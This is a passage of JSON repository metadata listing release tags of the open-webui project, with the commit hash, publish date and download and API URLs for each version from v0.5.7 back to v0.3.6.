cies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7/manifests"},{"name":"v0.5.6","sha":"9dd45ddf7c5cea09be434278edf68f3fdb23dcfd","kind":"commit","published_at":"2025-01-22T22:13:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6/manifests"},{"name":"v0.5.5","sha":"568dbc545cdd7e1d08e0db7851bace82db04a418","kind":"commit","published_at":"2025-01-22T19:34:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5/manifests"},{"name":"v0.5.4","sha":"506dc0149ca973e20768fa3d6f171afac289f606","kind":"commit","published_at":"2025-01-05T09:38:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4/manifests"},{"name":"v0.5.3","sha":"4bc9904b3cd0726d3f9c3cbaeade972cf167b6c4","kind":"commit","published_at":"2024-12-31T21:41:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"e42cbf07f5a0c1fea2441e37f36f06510a2a781d","kind":"commit","published_at":"2024-12-27T07:51:49.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"2bdf99b398cf2f5ee3e15672aeecd542a5bf067d","kind":"commit","published_at":"2024-12-26T06:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"22132e155aa7e8522f4c79a7aae4bcfc0d7f6b0d","kind":"commit","published_at":"2024-12-25T18:39:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0/manifests"},{"name":"v0.4.8","sha":"29a271959556743e6deb4d55a5a982983335d7ab","kind":"commit","published_at":"2024-12-07T08:42:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"c4ea31357f49d08a14c86b2bd85fdcd489512e91","kind":"commit","published_at":"2024-12-01T08:42:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"0a26c41c7b58300f37348ba580a4f0d682ca5fbd","kind":"commit","published_at":"2024-11-27T04:24:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6/manifests"},{"name":"v0.4.5","sha":"4831c9e57e35a0619d9212b7b573e2c6a9443c8c","kind":"commit","published_at":"2024-11-26T09:55:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5/manifests"},{"name":"v0.4.4","sha":"db929b5d5ec1694a80ae707a74a52a6dac9f7451","kind":"commit","published_at":"2024-11-23T03:27:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"c13bcfdfc9fcb9b72e516cb72c89f234511c89df","kind":"commit","published_at":"2024-11-22T06:47:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"6f4bc9864c9ca613fc0dae3ba1db3accfe1d1e5e","kind":"commit","published_at":"2024-11-20T20:24:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"02e94c826440162e381cad382d3ac1b0eb2b3d73","kind":"commit","published_at":"2024-11-20T04:17:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"3c334320921caaeac8ec587dc2e227e3a886177c","kind":"commit","published_at":"2024-11-19T22:28:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0/manifests"},{"name":"v0.3.35","sha":"f1f068f458c07909247484b69bcb9a0e96b4eaeb","kind":"commit","published_at":"2024-10-26T20:17:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35/manifests"},{"name":"v0.3.34","sha":"f10c729e3d1a1cfc82be5bf970ac3716649f472e","kind":"commit","published_at":"2024-10-26T07:44:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34/manifests"},{"name":"v0.3.33","sha":"99dd7fb5a836511e02e2a3761aeab75f2e8b5687","kind":"commit","published_at":"2024-10-24T20:36:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.33","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33/manifests"},{"name":"v0.3.32","sha":"bc29d5d3c3534c7e42eb3bdf5fa5e11e7a287aaa","kind":"commit","published_at":"2024-10-07T05:06:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32/manifests"},{"name":"v0.3.31","sha":"c8c41e07e96140253eae07746ae24a120f9f33b7","kind":"commit","published_at":"2024-10-07T01:50:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31/manifests"},{"name":"v0.3.30","sha":"7b8f923981b004d6183cd6e4f95b408b613baf9e","kind":"commit","published_at":"2024-09-26T02:13:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30/manifests"},{"name":"v0.3.29","sha":"82cda6e52204f621882df696a4a26cc20ab482a0","kind":"commit","published_at":"2024-09-25T13:46:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29/manifests"},{"name":"v0.3.28","sha":"534e4c90ca5a95d37d325b2e6a54fa36697ee736","kind":"commit","published_at":"2024-09-24T16:52:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28/manifests"},{"name":"v0.3.27","sha":"ba20c71963963e58a012eb3d537af7c6c7a543d2","kind":"commit","published_at":"2024-09-24T16:13:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27/manifests"},{"name":"v0.3.26","sha":"c0738cef26df70a65898bd8e14dbb4c1dc6937a4","kind":"commit","published_at":"2024-09-24T13:41:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26/manifests"},{"name":"v0.3.25","sha":"019cf8199f1f4842b8f61cc3143b782433b55779","kind":"commit","published_at":"2024-09-24T12:07:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25/manifests"},{"name":"v0.3.24","sha":"7ec72679f0c981e577b71d3f3529ce3e8839521d","kind":"commit","published_at":"2024-09-24T11:32:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24/manifests"},{"name":"v0.3.23","sha":"ff8a2da751e4b64441909554965cd51c60f5332a","kind":"commit","published_at":"2024-09-21T02:55:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23/manifests"},{"name":"v0.3.22","sha":"83855b713b0f211144993486ac5265d3d67bb1f8","kind":"commit","published_at":"2024-09-19T22:25:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22/manifests"},{"name":"v0.3.21","sha":"50db51ebe08c018bf46acfaf55985ff998da50bc","kind":"commit","published_at":"2024-09-07T23:59:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21/manifests"},{"name":"v0.3.20","sha":"e2ef36b582b06f1edef0fe84064ce4ae45fa085b","kind":"commit","published_at":"2024-09-07T04:08:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20/manifests"},{"name":"v0.3.19","sha":"05c0423d6eba64c78fbcfeda4059e54160d2fd35","kind":"commit","published_at":"2024-09-05T18:47:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19/manifests"},{"name":"v0.3.18","sha":"9204498420c89e347af13fe53b1d0ddcb6379dfc","kind":"commit","published_at":"2024-09-04T18:09:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18/manifests"},{"name":"v0.3.17","sha":"a9801147b83bfeecc147708941bec1a4b29823cc","kind":"commit","published_at":"2024-09-04T16:40:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17/manifests"},{"name":"v0.3.16","sha":"693dc3107a71e76e50c0f765b83eaa45acfdab87","kind":"commit","published_at":"2024-08-27T16:49:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16/manifests"},{"name":"v0.3.15","sha":"847ca660018fe70dc56d29ef86eeee006684058d","kind":"commit","published_at":"2024-08-21T22:28:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15/manifests"},{"name":"v0.3.14","sha":"8a620cab442ab61b1f80c21d6b68df7b020fb10c","kind":"commit","published_at":"2024-08-21T15:36:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14/manifests"},{"name":"v0.3.13","sha":"13b0e7d64a708f69c5ce58cf0897d9951d0d16ad","kind":"commit","published_at":"2024-08-14T19:45:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13/manifests"},{"name":"v0.3.12","sha":"c869652ef4907dd123a140d9a08a0c239e690b08","kind":"commit","published_at":"2024-08-07T13:22:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12/manifests"},{"name":"v0.3.11","sha":"a58dfccb7dab4c7c42c8b4528f1d330bb1626e5f","kind":"commit","published_at":"2024-08-02T22:03:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"c74e7df6a04ec942af476332f4660f9d2a95fb7e","kind":"commit","published_at":"2024-07-17T15:51:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"6e843ab563c6843aac3fa5bf13056cdd1ebdbaff","kind":"commit","published_at":"2024-07-17T10:18:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"9bcd4ce5c0a01af68c0d2aa44554a68bb741c61b","kind":"commit","published_at":"2024-07-09T21:25:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4900ac5136579c44c1be63f9b093fe8aff199910","kind":"commit","published_at":"2024-06-30T03:26:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"b0724811dfdb70883c112c20e05dda46707e0330","kind":"commit","published_at":"2024-06-27T20:38:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.6","html_url":"https: